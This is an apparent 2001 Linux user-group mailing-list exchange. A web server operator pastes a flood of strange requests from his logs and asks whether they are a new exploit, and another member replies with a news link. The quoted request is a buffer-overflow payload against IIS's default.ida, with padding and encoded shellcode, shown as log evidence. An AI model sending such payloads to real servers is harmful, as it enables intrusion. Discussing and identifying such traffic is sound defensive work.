This might fit what you're experiencing: http://www.theregister.co.uk/content/4/20474.html -Adam On Sun, 15 Jul 2001, Doctor Orbitz wrote:
Hey, I have recently been gettign a BUTTLOAD of hits on my web server that look like this: "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0"
I've just recntly had a ton of requests liek that, is this a new exploit or what??
Orbitz
_______________________________________________ Wlug mailing list Wlug@mail.wlug.org http://mail.wlug.org/mailman/listinfo/wlug
end ___________________________________________________ Adam S. Keck | | 593 Centre St. | "Got BSD?" Jamaica Plain, Boston | Ma, 02130 | ---------------------------------------------------